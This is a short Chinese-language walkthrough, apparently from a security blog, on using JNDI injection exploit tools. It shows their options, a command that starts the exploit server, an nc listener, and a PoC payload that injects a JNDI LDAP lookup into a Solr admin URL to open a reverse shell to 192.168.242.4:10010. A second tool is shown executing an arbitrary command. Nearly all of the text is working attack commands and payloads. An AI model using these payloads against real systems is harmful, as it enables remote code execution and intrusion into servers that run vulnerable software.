漏洞介绍
JNDIExploit使用
0x727/JNDIExploit: 一款用于JNDI注入利用的工具
参考:JNDIExploit使用 - FreeBuf网络安全行业门户
1
2
3
4
5
6
7
Usage: java -jar JNDIExploit.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
1
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 6666 -i 192.168.242.4
开启监听
1
nc -lvvp 10010
1
2
3
4
## poc
${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}
http://your-ip/solr/admin/cores?action=${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}
JNDI-Injection-Exploit 使用
sayers522/JNDI-Injection-Exploit: JNDI命令注入利用
编译
1
mvn clean package -DskipTests
命令:
1
2
3
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calendar.app" -A 127.0.0.1